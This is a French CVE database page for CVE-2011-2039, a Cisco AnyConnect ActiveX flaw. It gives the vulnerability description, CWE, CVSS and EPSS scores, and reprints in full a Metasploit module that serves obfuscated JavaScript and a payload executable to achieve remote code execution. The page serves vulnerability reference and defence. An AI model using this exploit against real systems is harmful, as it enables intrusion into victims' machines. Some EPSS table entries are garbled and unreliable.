CPE, qui signifie Common Platform Enumeration, est un système normalisé de dénomination du matériel, des logiciels et des systèmes d'exploitation. CPE fournit un schéma de dénomination structuré pour identifier et classer de manière unique les systèmes informatiques, les plates-formes et les progiciels sur la base de certains attributs tels que le fournisseur, le nom du produit, la version, la mise à jour, l'édition et la langue.
CWE, ou Common Weakness Enumeration, est une liste complète et une catégorisation des faiblesses et des vulnérabilités des logiciels. Elle sert de langage commun pour décrire les faiblesses de sécurité des logiciels au niveau de l'architecture, de la conception, du code ou de la mise en œuvre, qui peuvent entraîner des vulnérabilités.
CAPEC, qui signifie Common Attack Pattern Enumeration and Classification (énumération et classification des schémas d'attaque communs), est une ressource complète, accessible au public, qui documente les schémas d'attaque communs utilisés par les adversaires dans les cyberattaques. Cette base de connaissances vise à comprendre et à articuler les vulnérabilités communes et les méthodes utilisées par les attaquants pour les exploiter.
Services & Prix
Aides & Infos
Recherche de CVE id, CWE id, CAPEC id, vendeur ou mots clés dans les CVE
The helper application in Cisco AnyConnect Secure Mobility Client (formerly AnyConnect VPN Client) before 2.3.185 on Windows, and on Windows Mobile, downloads a client executable file (vpndownloader.exe) without verifying its authenticity, which allows remote attackers to execute arbitrary code via the url property to a certain ActiveX control in vpnweb.ocx, aka Bug ID CSCsy00904.
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly.
Métriques
Métriques
Score
Gravité
CVSS Vecteur
Source
V2
7.6
AV:N/AC:H/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
83.32%
–
–
2022-05-08
–
–
82.5%
–
–
2022-07-24
–
–
81.97%
–
–
2023-03-12
–
–
–
60.76%
–
2023-08-20
–
–
–
62.06%
–
2023-10-15
–
–
–
68.61%
–
2023-12-03
–
–
–
79.49%
–
2024-01-21
–
–
–
75.94%
–
2024-03-17
–
–
–
75.1%
–
2024-06-02
–
–
–
79.87%
–
2024-06-02
–
–
–
79.87%
–
2024-06-23
–
–
–
78.19%
–
2024-08-04
–
–
–
79.81%
–
2024-09-15
–
–
–
80.72%
–
2024-11-03
–
–
–
80.38%
–
2024-12-15
–
–
–
71.13%
–
2024-12-22
–
–
–
64.61%
–
2025-01-26
–
–
–
56.81%
–
2025-01-19
–
–
–
64.61%
–
2025-01-25
–
–
–
56.81%
–
2025-03-18
–
–
–
–
85.34%
2025-03-18
–
–
–
–
85.34,%
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Date de publication : 2011-06-05 22h00 +00:00 Auteur : Metasploit EDB Vérifié : Yes
##
# $Id: cisco_anyconnect_exec.rb 12872 2011-06-06 20:15:51Z bannedit $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute',
'Description' => %q{
This module exploits a vulnerability in the Cisco AnyConnect VPN client
vpnweb.ocx ActiveX control. This control is typically used to install the
VPN client. An attacker can set the 'url' property which is where the control
tries to locate the files needed to install the client.
The control tries to download two files from the site specified within the
'url' property. One of these files it will be stored in a temporary directory and
executed.
},
'License' => MSF_LICENSE,
'Author' => [ 'bannedit' ],
'Version' => '$Revision: 12872 $',
'References' =>
[
[ 'CVE', '2011-2039' ],
[ 'OSVDB', '72714'],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909' ],
[ 'URL', 'http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml'],
],
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic',
{
'Arch' => ARCH_X86
}
],
],
'DisclosureDate' => 'Jun 01 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
], self.class)
end
def on_request_uri(cli, request)
if request.uri.match(/vpndownloader\.exe/)
exe = generate_payload_exe({:code => payload.encoded})
print_status("Client requested: #{request.uri}. Sending vpndownloader.exe")
send_response(cli, exe, { 'Content-Type' => 'application/octet-stream' })
select(nil, nil, nil, 5) # let the file download
handler(cli)
return
end
if request.uri.match(/updates\.txt/)
print_status("Client requested: #{request.uri}. Sending updates.txt")
updates = rand_text_alpha((rand(500) + 1)) + "\n" + rand_text_alpha((rand(500) + 1))
send_response(cli, updates, { 'Content-Type' => 'text/plain' })
return
end
url = get_uri(cli)
dir = rand_text_alpha((rand(40) + 1))
js = ::Rex::Exploitation::JSObfu.new %Q|
var x = document.createElement("object");
x.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
x.url = "#{url}/#{dir}/";
|
js.obfuscate
html = "<html>\n\t<script>#{js}\t</script>\n</html>"
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, html)
end
end
Products Mentioned
Configuraton 0
Cisco>>Anyconnect_secure_mobility_client >> Version To (including) 2.3